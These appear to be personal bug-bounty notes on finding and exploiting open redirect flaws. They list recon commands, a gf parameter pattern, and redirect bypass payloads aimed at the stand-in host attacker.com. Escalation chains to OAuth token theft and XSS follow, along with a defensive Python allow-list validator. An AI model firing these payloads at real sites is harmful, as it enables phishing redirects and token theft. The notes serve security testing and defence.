Hunting URL redirects

https://0x00sec.org/t/open-redirection-guide/21118

The tools are all written in Go and I don't really know how to use them yet, so I'm leaving this as a placeholder for now.

Identifying possible vulnerable endpoints:

  • waybackurls + hakrawler + gf

    cat subdomains | waybackurls | tee -a urls
    cat subdomains | hakrawler -depth 3 -plain | tee -a urls
    gf redirect urls

    using redirect.json with gf:

{
    "flags" : "-HanrE",
    "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
}
  • Google dorks
    site:domain.com inurl:[PARAMETER] using a parameter list
  • Manual inspection by navigating the webapp and intercepting the requests

Confirm and exploit:

* https://company.com/?redirect=http://attacker.com
* https://company.com/?redirect=http://company.com.attacker.com
* https://company.com/?redirect=https://company.com@attacker.com
* https://company.com/?redirect=//attacker.com
* https://company.com/?redirect=http://attacker.com#company.com
* https://company.com/?redirect=http://attacker.com?company.com
* https://company.com/?redirect=http://attacker.com/company.com
* https://company.com/?redirect=http://????????.???

Using special characters:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛

Special characters’ source

Escalating to other vulnerabilities:

Open Redirect + Misconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS

Source

Escalate to XSS

  • https://company.com/?redirect=javascript:alert(1)
  • https://company.com/?redirect=javascript:prompt(1)
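As an added defender-side example (not from the 0x00sec guide or this note), a Python allow-list check for the redirect parameter that rejects every bypass form in the "Confirm and exploit" list above as well as the javascript: URIs in this XSS section. The host names company.com and attacker.com are the same placeholders used above, and the allow-list is constructed for the example.

```python
from urllib.parse import urlsplit

# Constructed allow-list: the only hosts a server should ever 302 to.
ALLOWED_HOSTS = {"company.com", "www.company.com"}


def is_safe_redirect(target: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only if `target` is a destination the app may safely redirect to.

    Reject in order: CRLF/control/whitespace (Location header injection),
    non-ASCII (enclosed alphanumerics and other Unicode that browsers may fold
    into a different host), non-http(s) schemes (javascript:, data:), protocol
    relative or backslash forms (//host, /\\host), userinfo tricks
    (company.com@attacker.com) and any host not on the allow-list.
    """
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        return False
    if not target.isascii():
        return False
    parts = urlsplit(target)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return False
    if parts.netloc == "":
        # A relative path is fine, but "//host" and "/\host" are treated as
        # absolute URLs by browsers, so require a single leading slash.
        return target.startswith("/") and not target.startswith(("//", "/\\"))
    if parts.username is not None or parts.password is not None:
        return False
    # .hostname strips port and userinfo and lower-cases, so subdomain padding
    # like company.com.attacker.com is compared as a whole string.
    return (parts.hostname or "") in allowed_hosts


# Constructed sample inputs: the bypass payloads listed on this page plus two
# legitimate destinations, so the behaviour of the check can be seen at once.
SAMPLE_TARGETS = [
    "http://attacker.com",
    "http://company.com.attacker.com",
    "https://company.com@attacker.com",
    "//attacker.com",
    "http://attacker.com#company.com",
    "http://attacker.com?company.com",
    "http://attacker.com/company.com",
    "javascript:alert(1)",
    "javascript:prompt(1)",
    "http://company.com/dashboard\r\nSet-Cookie: x=1",
    "https://company.com/account",
    "/account/settings",
]


def evaluate(targets=SAMPLE_TARGETS) -> dict:
    """Map each candidate redirect target to the verdict of is_safe_redirect."""
    return {t: is_safe_redirect(t) for t in targets}
```

Only the last two constructed targets are accepted; every payload copied from the lists above is refused.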

Escalate to XSS using CRLFi
